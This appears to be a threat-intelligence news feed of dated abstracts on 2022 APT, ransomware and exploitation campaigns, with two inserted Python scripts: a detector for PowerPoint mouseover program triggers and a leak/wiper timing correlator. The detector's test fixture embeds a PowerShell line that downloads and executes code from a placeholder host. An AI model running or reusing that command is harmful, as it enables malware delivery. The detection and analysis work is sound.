The operators of RomCom RAT are continuing to evolve their campaigns with rogue versions of software such as SolarWinds Network Performance Monitor, KeePass password manager, and PDF Reader Pro. Targets of the operation consist of victims in Ukraine and select English-speaking countries like the U.K. "Given the geography of the targets and the current geopolitical situation, it's unlikely that the RomCom RAT threat actor is cybercrime-motivated," the BlackBerry Threat Research and Intelligence Team said in a new analysis. The latest findings come a week after the Canadian cybersecurity company disclosed a spear-phishing campaign aimed at Ukrainian entities to deploy a remote access trojan called RomCom RAT. The unknown threat actor has also been observed leveraging trojanized variants of Advanced IP Scanner and pdfFiller as droppers to distribute the implant. The latest iteration of the campaign entails setting up decoy lookalike websites with a similar domain ... The Hacker News
November 1, 2022
Cranefly Group Abuses Legitimate IIS Logs To Deliver New Malware Full Text
Abstract
The Cranefly hacker group was spotted leveraging Microsoft IIS to deploy a previously undocumented dropper, named Danfuan, on security tools such as load balancers and SAN arrays. With new custom tools and evasive techniques, Cranefly is maintaining a foothold on compromised servers and focusing on ... Cyware Alerts - Hacker News
November 01, 2022
Chinese Hackers Using New Stealthy Infection Chain to Deploy LODEINFO Malware Full Text
Abstract
The Chinese state-sponsored threat actor known as Stone Panda has been observed employing a new stealthy infection chain in its attacks aimed at Japanese entities. Targets include media, diplomatic, governmental and public sector organizations and think-tanks in Japan, according to twin reports published by Kaspersky. Stone Panda, also called APT10, Bronze Riverside, Cicada, and Potassium, is a cyber espionage group known for its intrusions against organizations identified as strategically significant to China. The threat actor is believed to have been active since at least 2009. The latest set of attacks, observed between March and June 2022, involve the use of a bogus Microsoft Word file and a self-extracting archive (SFX) file in RAR format propagated via spear-phishing emails, leading to the execution of a backdoor called LODEINFO. While the maldoc requires users to enable macros to activate the killchain, the June 2022 campaign was found to drop this method in favor ... The Hacker News
October 31, 2022
Hacking group abuses antivirus software to launch LODEINFO malware Full Text
Abstract
The Chinese Cicada hacking group, tracked as APT10, was observed abusing security software to install a new version of the LODEINFO malware against Japanese organizations. BleepingComputer
October 28, 2022
Researchers Uncover Stealthy Techniques Used by Cranefly Espionage Hackers Full Text
Abstract
A recently discovered hacking group known for targeting employees dealing with corporate transactions has been linked to a new backdoor called Danfuan. This hitherto undocumented malware is delivered via another dropper called Geppei, researchers from Symantec, by Broadcom Software, said in a report shared with The Hacker News. The dropper "is being used to install a new backdoor and other tools using the novel technique of reading commands from seemingly innocuous Internet Information Services (IIS) logs," the researchers said. The toolset has been attributed by the cybersecurity company to a suspected espionage actor called UNC3524, aka Cranefly, which first came to light in May 2022 for its focus on bulk email collection from victims who deal with mergers and acquisitions and other financial transactions. One of the group's key malware strains is QUIETEXIT, a backdoor deployed on network appliances that do not support antivirus or endpoint detection, such ... The Hacker News
October 28, 2022
Hackers use Microsoft IIS web server logs to control malware Full Text
Abstract
The Cranefly hacking group, aka UNC3524, uses a previously unseen technique of controlling malware on infected devices via Microsoft Internet Information Services (IIS) web server logs. BleepingComputer
October 26, 2022
Notorious ‘BestBuy’ hacker arraigned for running dark web market Full Text
Abstract
A notorious British hacker was arraigned on Wednesday by the U.S. Department of Justice for allegedly running the now defunct 'The Real Deal' dark web marketplace. BleepingComputer
October 26, 2022
Kimsuky Hackers Spotted Using 3 New Android Malware to Target South Koreans Full Text
Abstract
The North Korean espionage-focused actor known as Kimsuky has been observed using three different Android malware strains to target users located in its southern counterpart. That's according to findings from South Korean cybersecurity company S2W, which named the malware families FastFire, FastViewer, and FastSpy. "The FastFire malware is disguised as a Google security plugin, and the FastViewer malware disguises itself as 'Hancom Office Viewer,' [while] FastSpy is a remote access tool based on AndroSpy," researchers Lee Sebin and Shin Yeongjae said. Kimsuky, also known by the names Black Banshee, Thallium, and Velvet Chollima, is believed to be tasked by the North Korean regime with a global intelligence-gathering mission, disproportionately targeting individuals and organizations in South Korea, Japan, and the U.S. This past August, Kaspersky unearthed a previously undocumented infection chain dubbed GoldDragon to deploy a Windows backdoor capable of ... The Hacker News
October 26, 2022
Unknown Actors are Deploying RomCom RAT to Target Ukrainian Military Full Text
Abstract
The threat actor behind a remote access trojan called RomCom RAT has been observed targeting Ukrainian military institutions as part of a new spear-phishing campaign that commenced on October 21, 2022. The development marks a shift in the attacker's modus operandi, which has been previously attributed to spoofing legitimate apps like Advanced IP Scanner and pdfFiller to drop backdoors on compromised systems. "The initial 'Advanced IP Scanner' campaign occurred on July 23, 2022," the BlackBerry research and intelligence team said. "Once the victim installs a Trojanized bundle, it drops RomCom RAT to the system." While previous iterations of the campaign involved the use of trojanized Advanced IP Scanner, the unidentified adversarial collective has since switched to pdfFiller as of October 20, indicating an active attempt on part of the adversary to refine tactics and thwart detection. These lookalike websites host a rogue installer package that ... The Hacker News
October 26, 2022
Vice Society Hackers Are Behind Several Ransomware Attacks Against Education Sector Full Text
Abstract
A cybercrime group known as Vice Society has been linked to multiple ransomware strains in its malicious campaigns aimed at the education, government, and retail sectors. The Microsoft Security Threat Intelligence team, which is tracking the threat cluster under the moniker DEV-0832, said the group avoids deploying ransomware in some cases and rather likely carries out extortion using exfiltrated stolen data. "Shifting ransomware payloads over time from BlackCat , Quantum Locker , and Zeppelin , DEV-0832's latest payload is a Zeppelin variant that includes Vice Society-specific file extensions, such as .v-s0ciety, .v-society, and, most recently, .locked," the tech giant's cybersecurity division said . Vice Society, active since June 2021, has been steadily observed encrypting and exfiltrating victim data, and threatening companies with exposure of siphoned information to pressure them into paying a ransom. "Unlike other RaaS (Ransomware-as-a-Service)The Hacker News
October 21, 2022
What Impact, if Any, Does Killnet Have? Full Text
Abstract
Killnet, the pro-Russian hacktivist collective, launched an ineffective DDoS attack on U.S. government websites earlier this month, leaving many to wonder what the purpose of such groups is and what impact they actually have, especially amid the war in Ukraine.Lawfare
October 20, 2022
Hacking group updates Furball Android spyware to evade detection Full Text
Abstract
A new version of the 'FurBall' Android spyware has been found targeting Iranian citizens in mobile surveillance campaigns conducted by the Domestic Kitten hacking group, also known as APT-C-50.BleepingComputer
October 19, 2022
Winnti Threat Group Targets Government Organizations In Hong Kong and Sri Lanka Full Text
Abstract
In its latest activities, Winnti focused on Hong Kong and Sri Lankan organizations. It deployed Spyder Loader (Trojan.Spyload) malware on victim networks in Hong Kong, mostly as part of the CuckooBees campaign.Heimdal Security
October 19, 2022
Is it TeamTNT Or a Copycat Group? Full Text
Abstract
Researchers have observed activity that appears to mark the return of TeamTNT, or of a copycat group imitating its routines; either way, the actor has been deploying an XMRig cryptocurrency miner.Trend Micro
October 18, 2022
Hackers target Asian casinos in lengthy cyberespionage campaign Full Text
Abstract
A hacking group named 'DiceyF' has been observed deploying a malicious attack framework against online casinos based in Southeast Asia since at least November 2021.BleepingComputer
October 17, 2022
Black Basta Ransomware Hackers Infiltrate Networks via Qakbot to Deploy Brute Ratel C4 Full Text
Abstract
The threat actors behind the Black Basta ransomware family have been observed using the Qakbot trojan to deploy the Brute Ratel C4 framework as a second-stage payload in recent attacks. The development marks the first time the nascent adversary simulation software is being delivered via a Qakbot infection, cybersecurity firm Trend Micro said in a technical analysis released last week. The intrusion, achieved using a phishing email containing a weaponized link pointing to a ZIP archive, further entailed the use of Cobalt Strike for lateral movement. While these legitimate utilities are designed for conducting penetration testing activities, their ability to offer remote access has made them a lucrative tool in the hands of attackers looking to stealthily probe the compromised environment without attracting attention for extended periods of time. This has been compounded by the fact that a cracked version of Brute Ratel C4 began circulating last month across the cybercrimiThe Hacker News
October 14, 2022
New Chinese Cyberespionage Group Targeting IT Service Providers and Telcos Full Text
Abstract
Telecommunications and IT service providers in the Middle East and Asia are being targeted by a previously undocumented Chinese-speaking threat group dubbed WIP19 . The espionage-related attacks are characterized by the use of a stolen digital certificate issued by a Korean company called DEEPSoft to sign malicious artifacts deployed during the infection chain to evade detection. "Almost all operations performed by the threat actor were completed in a 'hands-on keyboard' fashion, during an interactive session with compromised machines," SentinelOne researchers Joey Chen and Amitai Ben Shushan Ehrlich said in a report this week. "This meant the attacker gave up on a stable [command-and-control] channel in exchange for stealth." WIP, short for work-in-progress, is the moniker assigned by SentinelOne to emerging or hitherto unattributed activity clusters, similar to the UNC####, DEV-####, and TAG-## designations given by Mandiant, Microsoft, and RecoThe Hacker News
October 14, 2022
Operators Behind IcedID Trojan Diversify their Delivery Tactics Full Text
Abstract
Threat actors behind the IcedID malware have been found using a variety of propagation methods in their phishing campaigns, including changes to how they manage C2 server IPs. The attackers were found registering fresh domains for C2 instead of relying on the old ones.Cyware Alerts - Hacker News
October 13, 2022
Budworm Espionage Group Returns to Targeting U.S. Organizations Full Text
Abstract
Budworm’s main payload continues to be the HyperBro malware family, which is often loaded using a technique known as DLL side-loading. This involves the attackers placing a malicious DLL in a directory where a legitimate DLL is expected to be found.Symantec
October 13, 2022
New Alchimist Attack Framework Written in Chinese for Mac, Linux, and Windows Full Text
Abstract
Cisco Talos discovered a new attack framework including a command and control (C2) tool called "Alchimist" and a new malware "Insekt" with remote administration capabilities.Cisco Talos
October 13, 2022
Budworm Hackers Resurface with New Espionage Attacks Aimed at U.S. Organization Full Text
Abstract
An advanced persistent threat (APT) actor known as Budworm targeted a U.S.-based entity for the first time in more than six years, according to latest research. The attack was aimed at an unnamed U.S. state legislature, the Symantec Threat Hunter team, part of Broadcom Software, said in a report shared with The Hacker News. Other "strategically significant" intrusions mounted over the past six months were directed against a government of a Middle Eastern country, a multinational electronics manufacturer, and a hospital in South East Asia. Budworm , also called APT27, Bronze Union, Emissary Panda, Lucky Mouse, and Red Phoenix, is a threat actor that's believed to operate on behalf of China through attacks that leverage a mix of custom and openly available tools to exfiltrate information of interest. "Bronze Union maintains a high degree of operational flexibility in order to adapt to the environments it operates in," Secureworks notes in a profile ofThe Hacker News
October 11, 2022
Experts analyzed the evolution of the Emotet supply chain Full Text
Abstract
Threat actors behind the Emotet bot are continually improving their tactics, techniques, and procedures to avoid detection. VMware researchers have analyzed the supply chain behind the Emotet malware reporting that its operators are continually shifting...Security Affairs
October 11, 2022
POLONIUM Threat Group Targets Israeli Organizations with ‘Creepy’ Malware Full Text
Abstract
ESET researchers revealed their findings about POLONIUM, an advanced persistent threat (APT) group about which little information is publicly available and whose initial compromise vector is unknown.ESET Security
October 10, 2022
Hackers behind IcedID malware attacks diversify delivery tactics Full Text
Abstract
The threat actors behind IcedID malware phishing campaigns are utilizing a wide variety of distribution methods, likely to determine what works best against different targets.BleepingComputer
October 10, 2022
Pro-Russia group KillNet targets US airports Full Text
Abstract
The pro-Russia hacktivist group 'KillNet' is behind massive DDoS attacks that hit websites of several major airports in the US. The group is claiming responsibility for massive distributed denial-of-service (DDoS) attacks...Security Affairs
October 08, 2022
Hackers Exploiting Unpatched RCE Flaw in Zimbra Collaboration Suite Full Text
Abstract
A severe remote code execution vulnerability in Zimbra's enterprise collaboration software and email platform is being actively exploited, with no patch currently available to remediate the issue. The shortcoming, assigned CVE-2022-41352 , carries a critical-severity rating of CVSS 9.8, providing a pathway for attackers to upload arbitrary files and carry out malicious actions on affected installations. "The vulnerability is due to the method ( cpio ) in which Zimbra's antivirus engine ( Amavis ) scans inbound emails," cybersecurity firm Rapid7 said in an analysis published this week. The issue is said to have been abused since early September 2022, according to details shared on Zimbra forums. While a fix is yet to be released, the software services company is urging users to install the "pax" utility and restart the Zimbra services. "If the pax package is not installed, Amavis will fall-back to using cpio, unfortunately the fall-back is iThe Hacker News
October 07, 2022
Hackers exploiting unpatched RCE bug in Zimbra Collaboration Suite Full Text
Abstract
Hackers are actively exploiting an unpatched remote code execution (RCE) vulnerability in Zimbra Collaboration Suite (ZCS), a widely deployed web client and email server.BleepingComputer
October 07, 2022
LofyGang hackers built a credential-stealing enterprise on Discord, NPM Full Text
Abstract
A threat group using the name 'LofyGang', operating since 2020, is considered responsible for creating and distributing over 200 malicious packages on multiple code hosting platforms, including GitHub and NPM.BleepingComputer
October 04, 2022
Hackers stole data from US defense org using Impacket, CovalentStealer Full Text
Abstract
The U.S. Government today released an alert about state-backed hackers using a custom CovalentStealer malware and the Impacket framework to steal sensitive data from a U.S. organization in the Defense Industrial Base (DIB) sector.BleepingComputer
October 4, 2022
Witchetty Group Uses Steganography To Target Middle East Entities Full Text
Abstract
In an ongoing cyberespionage campaign, hacking group Witchetty has been found targeting two governments in the Middle East and a stock exchange in Africa. Among the new tools used by the group is a backdoor named Stegmap, which is delivered using steganography, a rarely used technique.Cyware Alerts - Hacker News
October 3, 2022
Analysis of DeftTorero TTPs in 2019–2021 Full Text
Abstract
During the intrusion analysis of DeftTorero’s webshells, researchers noted traces suggesting that the threat actor exploited a file upload form and/or a command injection flaw in a functional or staging website hosted on the target web server.Securelist
October 01, 2022
State-Sponsored Hackers Likely Exploited MS Exchange 0-Days Against ~10 Organizations Full Text
Abstract
Microsoft on Friday disclosed that a single activity group in August 2022 achieved initial access and breached Exchange servers by chaining the two newly disclosed zero-day flaws in a limited set of attacks aimed at fewer than 10 organizations globally. "These attacks installed the Chopper web shell to facilitate hands-on-keyboard access, which the attackers used to perform Active Directory reconnaissance and data exfiltration," the Microsoft Threat Intelligence Center (MSTIC) said in a new analysis. The weaponization of the vulnerabilities is expected to ramp up in the coming days, Microsoft further warned, as malicious actors co-opt the exploits into their toolkits, including deploying ransomware, due to the "highly privileged access Exchange systems confer onto an attacker." The tech giant attributed the ongoing attacks with medium confidence to a state-sponsored organization, adding it was already investigating these attacks when the Zero Day Initiative dThe Hacker News
September 30, 2022
North Korean Hackers Weaponizing Open-Source Software in Latest Cyber Attacks Full Text
Abstract
A "highly operational, destructive, and sophisticated nation-state activity group" with ties to North Korea has been weaponizing open source software in their social engineering campaigns aimed at companies around the world since June 2022. Microsoft's threat intelligence teams, alongside LinkedIn Threat Prevention and Defense, attributed the intrusions with high confidence to Zinc , which is also tracked under the name Labyrinth Chollima. Attacks targeted employees in organizations across multiple industries, including media, defense and aerospace, and IT services in the U.S., the U.K., India, and Russia. The tech giant said it observed Zinc leveraging a "wide range of open-source software including PuTTY, KiTTY, TightVNC, Sumatra PDF Reader, and muPDF/Subliminal Recording software installer for these attacks." According to CrowdStrike , Zinc "has been active since 2009 in operations aimed at collecting political, military, and economic intelliThe Hacker News
September 30, 2022
North Korean State-backed Hackers Found Rigging Legit Open-Source Software with Malware Full Text
Abstract
The hackers, a sub-group of Lazarus called ZINC, are weaponizing a wide range of open-source software including PuTTY, KiTTY, TightVNC, Sumatra PDF Reader, and muPDF/Subliminal Recording software installers in a new wave of malware attacks.Security Week
September 29, 2022
Brazilian Prilex Hackers Resurfaced With Sophisticated Point-of-Sale Malware Full Text
Abstract
A Brazilian threat actor known as Prilex has resurfaced after a year-long operational hiatus with an advanced and complex malware to steal money by means of fraudulent transactions. "The Prilex group has shown a high level of knowledge about credit and debit card transactions, and how software used for payment processing works," Kaspersky researchers said . "This enables the attackers to keep updating their tools in order to find a way to circumvent the authorization policies, allowing them to perform their attacks." The cybercrime group emerged on the scene with ATM-focused malware attacks in the South American nation, providing it the ability to break into ATM machines to perform jackpotting – a type of attack aiming to dispense cash illegitimately – and clone thousands of credit cards to steal funds from the targeted bank's customers. Prilex's modus operandi over the years has since evolved to take advantage of processes relating to point-of-saleThe Hacker News
September 29, 2022
Hacker groups support protestors in Iran using Telegram, Signal and Darkweb Full Text
Abstract
Several hacker groups are assisting protestors in Iran using Telegram, Signal and other tools to bypass government censorship. Check Point Research (CPR) observed multiple hacker groups using Telegram, Signal and the darkweb to support protestors...Security Affairs
September 29, 2022
Hacking group hides backdoor malware inside Windows logo image Full Text
Abstract
Security researchers have discovered a malicious campaign by the 'Witchetty' hacking group, which uses steganography to hide a backdoor malware in a Windows logo.BleepingComputer
September 29, 2022
Microsoft: Lazarus hackers are weaponizing open-source software Full Text
Abstract
Microsoft says the North Korean-sponsored Lazarus threat group is trojanizing legitimate open-source software and using it to backdoor organizations in many industry sectors, such as technology, defense, and media entertainment.BleepingComputer
September 29, 2022
Hackers Aid Protests Against Iranian Government with Proxies, Leaks and Hacks Full Text
Abstract
Several hacktivist groups are using Telegram and other tools to aid anti-government protests in Iran to bypass regime censorship restrictions amid ongoing unrest in the country following the death of Mahsa Amini in custody. "Key activities are data leaking and selling, including officials' phone numbers and emails, and maps of sensitive locations," Israeli cybersecurity firm Check Point said in a new report. The company said it has also witnessed sharing of proxies and open VPN servers to get around censorship and reports on the internet status in the country, with one group helping the anti-government demonstrators access social media sites. Chief among them is a Telegram channel called Official Atlas Intelligence Group (AIG) that's primarily focused on publishing data associated with government officials as well as maps of prominent locations. Calling itself the "CyberArmy," the group is said to have commenced its operations in May and has alsoThe Hacker News
September 28, 2022
Hackers now sharing cracked Brute Ratel post-exploitation kit online Full Text
Abstract
The Brute Ratel post-exploitation toolkit has been cracked and is now being shared for free across Russian-speaking and English-speaking hacking communities.BleepingComputer
September 28, 2022
Hacker shares how they allegedly breached Fast Company’s site Full Text
Abstract
Fast Company took its website offline after it was hacked to display stories and push out Apple News notifications containing obscene and racist comments. Today, the hacker shared how they allegedly breached the site.BleepingComputer
September 28, 2022
Hackers Using PowerPoint Mouseover Trick to Infect System with Malware Full Text
Abstract
The Russian state-sponsored threat actor known as APT28 has been found leveraging a new code execution method that makes use of mouse movement in decoy Microsoft PowerPoint documents to deploy malware. The technique "is designed to be triggered when the user starts the presentation mode and moves the mouse," cybersecurity firm Cluster25 said in a technical report. "The code execution runs a PowerShell script that downloads and executes a dropper from OneDrive." The dropper, a seemingly harmless image file, functions as a pathway for a follow-on payload, a variant of a malware known as Graphite, which uses the Microsoft Graph API and OneDrive for command-and-control (C2) communications to retrieve additional payloads. The attack employs a lure document that makes use of a template potentially linked to the Organisation for Economic Co-operation and Development ( OECD ), a Paris-based intergovernmental entity. Cluster25 noted the attacks may be ongoing, conThe Hacker News
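The mouseover trigger described above can be hunted for statically, because a .pptx is a ZIP of XML parts. The script below is an added example, not code from Cluster25 or from the article. It rests on one assumption that the abstract does not state: that such a trigger is expressed in PresentationML as an `a:hlinkMouseOver` (or `a:hlinkClick`) element whose `action` attribute is `ppaction://program`, with the command line held in the slide's relationships part. The sample deck, including its PowerShell command line, is constructed in memory so the scan runs offline.

```python
# Added example (not Cluster25's or the article's code): statically scan a
# .pptx for presentation-mode hyperlink actions that launch a program.
# Assumption, labelled as such: the trigger is an a:hlinkMouseOver (or
# a:hlinkClick) element with action="ppaction://program" whose r:id points
# to a relationship holding the command line. The sample file is constructed
# below so the script runs offline.
import io
import re
import zipfile
import xml.etree.ElementTree as ET

A_NS = "http://schemas.openxmlformats.org/drawingml/2006/main"
R_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
P_NS = "http://schemas.openxmlformats.org/presentationml/2006/main"
PKG_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
SLIDE_RE = re.compile(r"ppt/slides/slide\d+\.xml")


def _load_rels(z, slide_name):
    """Map relationship Ids to Targets for one slide's .rels part (empty if none)."""
    rels_name = slide_name.replace("ppt/slides/", "ppt/slides/_rels/") + ".rels"
    if rels_name not in z.namelist():
        return {}
    root = ET.fromstring(z.read(rels_name))
    return {r.get("Id"): r.get("Target")
            for r in root.iter("{%s}Relationship" % PKG_NS)}


def find_program_actions(pptx_bytes):
    """Return (slide part, trigger element, action, resolved target) for every
    hyperlink action in any slide whose action starts with ppaction://program."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(pptx_bytes)) as z:
        for name in z.namelist():
            if not SLIDE_RE.fullmatch(name):
                continue
            rels = _load_rels(z, name)
            root = ET.fromstring(z.read(name))
            for trigger in ("hlinkMouseOver", "hlinkClick"):
                for el in root.iter("{%s}%s" % (A_NS, trigger)):
                    action = el.get("action", "")
                    if action.startswith("ppaction://program"):
                        target = rels.get(el.get("{%s}id" % R_NS), "")
                        findings.append((name, trigger, action, target))
    return findings


def _slide_xml(link_tag, action, rid):
    """Minimal slide part with one shape carrying a hyperlink action."""
    return (
        '<p:sld xmlns:p="%s" xmlns:a="%s" xmlns:r="%s"><p:cSld><p:spTree>'
        '<p:sp><p:nvSpPr><p:cNvPr id="2" name="Rectangle">'
        '<a:%s r:id="%s" action="%s"/>'
        '</p:cNvPr></p:nvSpPr></p:sp></p:spTree></p:cSld></p:sld>'
        % (P_NS, A_NS, R_NS, link_tag, rid, action)
    )


def build_sample_pptx():
    """Constructed sample deck: slide1 carries the mouseover program trigger,
    slide2 a benign click action that only jumps to the next slide."""
    # Constructed command line; the URL is a placeholder, not a real dropper.
    cmd = ('powershell.exe -w hidden -c "Invoke-Expression (New-Object Net.WebClient)'
           ".DownloadString('https://example.invalid/dropper')\"")
    rels1 = (
        '<Relationships xmlns="%s">'
        '<Relationship Id="rId2" Type="%s/hyperlink" Target="%s" TargetMode="External"/>'
        '</Relationships>' % (PKG_NS, R_NS, cmd.replace('"', '&quot;'))
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("ppt/slides/slide1.xml",
                   _slide_xml("hlinkMouseOver", "ppaction://program", "rId2"))
        z.writestr("ppt/slides/_rels/slide1.xml.rels", rels1)
        z.writestr("ppt/slides/slide2.xml",
                   _slide_xml("hlinkClick", "ppaction://hlinkshowjump?jump=nextslide", "rId1"))
    return buf.getvalue()


if __name__ == "__main__":
    for slide, trigger, action, target in find_program_actions(build_sample_pptx()):
        print("%s: %s %s -> %s" % (slide, trigger, action, target))
```

Only the slide with `ppaction://program` is reported; the benign navigation action on the second slide is ignored, so the same scan can be pointed at a mail gateway's attachment quarantine without flagging ordinary decks.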
September 28, 2022
Stealthy hackers target military and weapons contractors in recent attack Full Text
Abstract
Security researchers have discovered a new campaign targeting multiple military contractors involved in weapon manufacturing, including an F-35 Lightning II fighter aircraft components supplier.BleepingComputer
September 27, 2022
North Korea-linked Lazarus continues to target job seekers with macOS malware Full Text
Abstract
North Korea-linked Lazarus APT group is targeting macOS users searching for jobs in the cryptocurrency industry, continuing a malware campaign that uses job opportunities as a lure. The attackers...Security Affairs
September 27, 2022
Optus hacker apologizes and allegedly deletes all stolen data Full Text
Abstract
The hacker who claimed to have breached Optus and stolen the data of 11 million customers has withdrawn their extortion demands after facing increased attention by law enforcement. The threat actor also apologized to 10,200 people whose personal data was already leaked on a hacking forum.BleepingComputer
September 27, 2022
North Korea’s Lazarus Hackers Targeting macOS Users Interested in Crypto Jobs Full Text
Abstract
The infamous Lazarus Group has continued its pattern of leveraging unsolicited job opportunities to deploy malware targeting Apple's macOS operating system. In the latest variant of the campaign observed by cybersecurity company SentinelOne last week, decoy documents advertising positions for the Singapore-based cryptocurrency exchange firm Crypto[.]com have been used to mount the attacks. The latest disclosure builds on previous findings from Slovak cybersecurity firm ESET in August, which delved into a similar phony job posting for the Coinbase cryptocurrency exchange platform. Both these fake job advertisements are just the latest in a series of attacks dubbed Operation In(ter)ception , which, in turn, is a constituent of a broader campaign tracked under the name Operation Dream Job . Although the exact distribution vector for the malware remains unknown, it's suspected that potential targets are singled out via direct messages on the business networking site LinkeThe Hacker News
September 27, 2022
Mandiant identifies 3 hacktivist groups working in support of Russia Full Text
Abstract
Mandiant researchers are tracking multiple self-proclaimed hacktivist groups working in support of Russia and have identified three groups linked to the GRU....Security Affairs
September 26, 2022
Researchers Identify 3 Hacktivist Groups Supporting Russian Interests Full Text
Abstract
At least three alleged hacktivist groups working in support of Russian interests are likely doing so in collaboration with state-sponsored cyber threat actors, according to Mandiant. The Google-owned threat intelligence and incident response firm said with moderate confidence that "moderators of the purported hacktivist Telegram channels 'XakNet Team,' 'Infoccentr,' and 'CyberArmyofRussia_Reborn' are coordinating their operations with Russian Main Intelligence Directorate (GRU)-sponsored cyber threat actors." Mandiant's assessment is based on evidence that the leakage of data stolen from Ukrainian organizations occurred within 24 hours of malicious wiper incidents undertaken by the Russian nation-state group tracked as APT28 (aka Fancy Bear, Sofacy, or Strontium). To that end, four of the 16 data leaks from these groups coincided with disk wiping malware attacks by APT28 that involved the use of a strain dubbed CaddyWiper . APT28 , aThe Hacker News
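The assessment above rests on a temporal overlap: leaks appearing within 24 hours of a wiper incident. The following is an added example, not Mandiant's code or data, of how an analyst can compute that overlap from two event lists. It assumes, as labelled in the code, that a leak is matched against wiper incidents at the same victim organisation, that the window counts in either direction, and that all timestamps are UTC; every event in it is constructed for illustration and the victim names are placeholders.

```python
# Added example (not Mandiant's code or data): flag hacktivist leak posts that
# fall within 24 hours of a wiper incident at the same victim, the temporal
# overlap used above to tie the Telegram channels to GRU operations.
# Assumptions, labelled as such: events are matched per victim organisation,
# the window is counted in either direction, and all timestamps are UTC.
# Every event below is constructed for illustration.
from datetime import datetime, timedelta

WINDOW = timedelta(hours=24)

# Constructed wiper incidents (victim names are placeholders).
WIPERS = [
    {"victim": "org-A", "time": "2022-03-01 02:10", "tool": "CaddyWiper"},
    {"victim": "org-B", "time": "2022-03-14 23:40", "tool": "CaddyWiper"},
    {"victim": "org-C", "time": "2022-04-08 10:00", "tool": "CaddyWiper"},
]

# Constructed leak posts on the channels named in the assessment.
LEAKS = [
    {"channel": "XakNet Team", "victim": "org-A", "time": "2022-03-01 20:15"},
    {"channel": "XakNet Team", "victim": "org-D", "time": "2022-03-05 12:00"},
    {"channel": "CyberArmyofRussia_Reborn", "victim": "org-B", "time": "2022-03-15 09:00"},
    {"channel": "Infoccentr", "victim": "org-C", "time": "2022-04-11 10:00"},
    {"channel": "XakNet Team", "victim": "org-C", "time": "2022-04-08 04:30"},
]


def _ts(s):
    """Parse the 'YYYY-MM-DD HH:MM' timestamps used in the event lists."""
    return datetime.strptime(s, "%Y-%m-%d %H:%M")


def correlate(wipers, leaks, window=WINDOW):
    """Return one record per (leak, wiper) pair at the same victim whose
    timestamps are no more than `window` apart, in either direction."""
    by_victim = {}
    for w in wipers:
        by_victim.setdefault(w["victim"], []).append(w)
    matches = []
    for leak in leaks:
        t_leak = _ts(leak["time"])
        for w in by_victim.get(leak["victim"], []):
            gap = abs(t_leak - _ts(w["time"]))
            if gap <= window:
                matches.append({
                    "channel": leak["channel"],
                    "victim": leak["victim"],
                    "leak_time": leak["time"],
                    "wiper_time": w["time"],
                    "tool": w["tool"],
                    "hours_apart": round(gap.total_seconds() / 3600, 1),
                })
    return matches


def summarize(wipers, leaks, window=WINDOW):
    """Return (leaks with at least one coincident wiper, total leaks)."""
    hit = {(m["channel"], m["victim"], m["leak_time"])
           for m in correlate(wipers, leaks, window)}
    return len(hit), len(leaks)


if __name__ == "__main__":
    for m in correlate(WIPERS, LEAKS):
        print("%(channel)s leak of %(victim)s at %(leak_time)s is %(hours_apart)s h "
              "from %(tool)s at %(wiper_time)s" % m)
    print("%d of %d leaks coincide with a wiper incident" % summarize(WIPERS, LEAKS))
```

With the constructed data, three of five leaks fall inside the window (one of them posted a few hours before the wiper ran) and the org-C leak posted three days later does not. Coincidence alone is not attribution; in practice the same script would be run against a null model of unrelated incidents to see how often a 24-hour overlap occurs by chance.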
September 26, 2022
Chinese Espionage Hackers Target Tibetans Using New LOWZERO Backdoor Full Text
Abstract
A China-aligned advanced persistent threat actor known as TA413 weaponized recently disclosed flaws in Sophos Firewall and Microsoft Office to deploy a never-before-seen backdoor called LOWZERO as part of an espionage campaign aimed at Tibetan entities. Targets primarily consisted of organizations associated with the Tibetan community, including enterprises associated with the Tibetan government-in-exile. The intrusions involved the exploitation of CVE-2022-1040 and CVE-2022-30190 (aka "Follina"), two remote code execution vulnerabilities in Sophos Firewall and Microsoft Office, respectively. "This willingness to rapidly incorporate new techniques and methods of initial access contrasts with the group's continued use of well known and reported capabilities, such as the Royal Road RTF weaponizer, and often lax infrastructure procurement tendencies," Recorded Future said in a new technical analysis. TA413, also known as LuckyCat, has been linked to relThe Hacker News
September 25, 2022
Attackers impersonate CircleCI platform to compromise GitHub accounts Full Text
Abstract
Threat actors target GitHub users to steal credentials and two-factor authentication (2FA) codes by impersonating the CircleCI DevOps platform. GitHub is warning of an ongoing phishing campaign targeting its users to steal credentials and two-factor...Security Affairs
September 25, 2022
New hacking group ‘Metador’ lurking in ISP networks for months Full Text
Abstract
A previously unknown threat actor that researchers have named 'Metador' has been breaching telecommunications, internet services providers (ISPs), and universities for about two years.BleepingComputer
September 23, 2022
Researchers unearth hacking group that’s been active, yet undetected for years Full Text
Abstract
The group attacks with variants of two Windows malware platforms deployed directly into memory, with indications of an additional Linux implant, and are capable of rapid adaptations.CyberScoop
September 23, 2022
Void Balaur Hackers-for-Hire Targeting Russian Businesses and Politics Entities Full Text
Abstract
A hack-for-hire group that was first exposed in 2019 has expanded its focus to set its sights on entities with business or political ties to Russia. Dubbed Void Balaur , the cyber mercenary collective has a history of launching cyberattacks against biotechnology and telecom companies since 2015. As many as 3,500 victims have been reported as of November 2021. "Void Balaur [...] primarily dabbles in cyber espionage and data theft, selling the stolen information to anyone willing to pay," Trend Micro noted at the time. Attacks conducted by the group are typically both generic and opportunistic and are aimed at gaining unauthorized access to widely-used email services, social media, messaging, and corporate accounts. Earlier this June, Google's Threat Analysis Group (TAG) took the wraps off a set of credential theft attacks targeting journalists, European politicians, and non-profits mounted by the threat actor. "Void Balaur also goes after targets vaThe Hacker News
September 22, 2022
Hackers stealing GitHub accounts using fake CircleCI notifications Full Text
Abstract
GitHub is warning of an ongoing phishing campaign that started on September 16 and is targeting its users with emails that impersonate the CircleCI continuous integration and delivery platform.BleepingComputer
September 22, 2022
Hackers Targeting Unpatched Atlassian Confluence Servers to Deploy Crypto Miners Full Text
Abstract
